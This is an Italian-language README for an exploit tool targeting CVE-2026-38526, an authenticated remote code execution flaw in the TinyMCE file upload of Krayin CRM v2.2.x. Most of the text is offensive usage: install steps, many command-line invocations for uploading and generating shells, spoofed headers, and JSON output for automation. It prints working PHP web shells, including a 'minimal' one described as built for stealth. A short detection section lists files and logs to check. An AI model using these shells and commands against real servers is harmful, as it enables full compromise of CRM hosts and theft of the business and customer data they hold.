Exploit CVE-2026-38526 per Krayin CRM v2.2.x - RCE autenticato tramite bypass del caricamento file di TinyMCE. Include shell interattiva, payload multi-tipo, generazione automatica di shell e verifica. Autore: Sudeepa Wanigarathna. Solo per test autorizzati.
⚠️ SOLO PER TEST DI SICUREZZA AUTORIZZATI - L'uso non autorizzato è illegale e non etico.
Questo strumento di exploit dimostra una vulnerabilità critica di esecuzione remota di codice autenticata (RCE) scoperta in Krayin CRM versione 2.2.x. La vulnerabilità risiede nella funzionalità di caricamento file di TinyMCE, che consente agli amministratori autenticati di caricare ed eseguire codice PHP arbitrario sul server.
| Proprietà | Valore |
|---|---|
| ID CVE | CVE-2026-38526 |
| Software Affetto | Krayin CRM v2.2.x |
| Tipo di Vulnerabilità | Esecuzione Remota di Codice Autenticata (RCE) |
| Autenticazione Richiesta | Sì (accesso a livello Amministratore) |
| Impatto | Compromissione completa del sistema |
| Punteggio CVSS | 8.8 (Alto) |
La vulnerabilità deriva da una validazione insufficiente del tipo di file nell'endpoint di caricamento file di TinyMCE (/admin/tinymce/upload). Un amministratore autenticato può:
bashPython 3.7+pip install httpx beautifulsoup4 coloramagit clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt
requirements.txt)httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6
python3 exploit.py -t <URL_DESTINAZIONE> -u <NOME_UTENTE> -p <PASSWORD> [OPZIONI]
| Parametro | Descrizione |
|---|---|
-t, --target | URL di destinazione (es. http://192.168.1.100) |
-u, --username | Nome utente o email dell'amministratore |
-p, --password | Password dell'amministratore |
# Sfruttamento base con shell generata
python3 exploit.py -t http://target.com -u [email protected] -p password
# Caricamento di un file shell PHP personalizzato
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php
# Generazione di shell avanzata con modalità interattiva
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i
# Generazione di un file shell senza sfruttamento
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php
# Utilizzo con proxy per test/debug
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080
# Output JSON per automazione
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json
# Modalità verbosa con timeout personalizzato
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60
# User-Agent e intestazioni personalizzate
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"
Shell Base (basic)
Esecuzione semplice di comandi con la funzione system().
<?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
Shell Avanzata (advanced)
Shell ricca di funzionalità con:
Shell Minima (minimal)
Impronta minima per la furtività.
<?php system($_GET["cmd"]); ?>
File Manager (file_manager)
Interfaccia completa per la gestione dei file:
Shell Personalizzata (custom)
Usa il tuo file shell PHP con il parametro -f.
Output colorato leggibile dall'uomo, adatto per uso interattivo.
-o json)Formato leggibile dalla macchina per automazione e integrazione.
{
"success": true,
"shell_url": "http://target.com/shell.php",
"upload_url": "/storage/upload/shell.php",
"message": "Upload successful",
"timestamp": 1699123456.789,
"details": {
"status_code": 200,
"response": "..."
}
}
-q, --quiet)Nessun output tranne che per gli errori. Utile per elaborazione batch.
| Opzione | Descrizione | Default |
|---|---|---|
--timeout | Timeout della richiesta in secondi | 30 |
--retry | Numero di tentativi di riprova | 3 |
--retry-delay | Ritardo tra i tentativi in secondi | 2 |
--user-agent | Stringa User-Agent personalizzata | UA browser default |
--header | Intestazioni HTTP personalizzate (Key: Value) | Nessuno |
--verify-ssl | Verifica certificati SSL | False |
--proxy | URL proxy HTTP/HTTPS | Nessuno |
-v, --verbose | Abilita output di debug | False |
-q, --quiet | Sopprime tutto l'output | False |
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"
File da Monitorare:
public/storage/upload/image.php.jpg)Log da Controllare:
/admin/tinymce/uploadIndicatori di Sistema: